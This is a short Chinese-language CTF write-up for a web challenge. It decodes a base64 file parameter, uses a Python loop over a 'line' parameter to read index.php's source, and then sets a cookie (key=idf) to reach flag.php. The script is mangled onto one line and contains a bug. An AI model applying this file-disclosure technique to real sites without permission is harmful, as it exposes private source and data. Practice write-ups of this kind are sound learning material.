链接：http://ctf.idf.cn/index.php?g=game&m=article&a=index&id=40

开始攻关：这里这里→ 

进去之后就是cd67918e02086c10de8202a75ca31c256636bef519b576b.............

这时我们稍微有点眼力的话，可以看见url中file的值是base64编码，解密后是flag.txt,,,,因为之前接触过类似的题目，我的第一反应就是包含漏洞，将index.php编码，我们在为

第一个参数赋值数字时，从0开始尝试，发现到18之后是空白，，可以写一个python脚本趴下来

import requestsfile=open("index.php","wb")for i in range(19):       url="http://ctf.idf.cn/game/web/40/index.php?line="+str(i)+"&file=aW5kZXgucGhw"        r=r.get(url)        content=r.content        file.write(content)file.close()

我们可以得到index.php文件

     'flag.txt',         '1' =>'index.php',    );    if(isset($_COOKIE['key']) && $_COOKIE['key']=='idf'){        $file_list[2]='flag.php';    }    if(in_array($file, $file_list)){        $fa = file($file);        echo $fa[$line];    }?>

意思就是，存在一个flag.php文件，我们需要添加cookie，key=idf

我们只需要借助火狐浏览器F9，添加cookie后，刷新，查看源文件

得到flag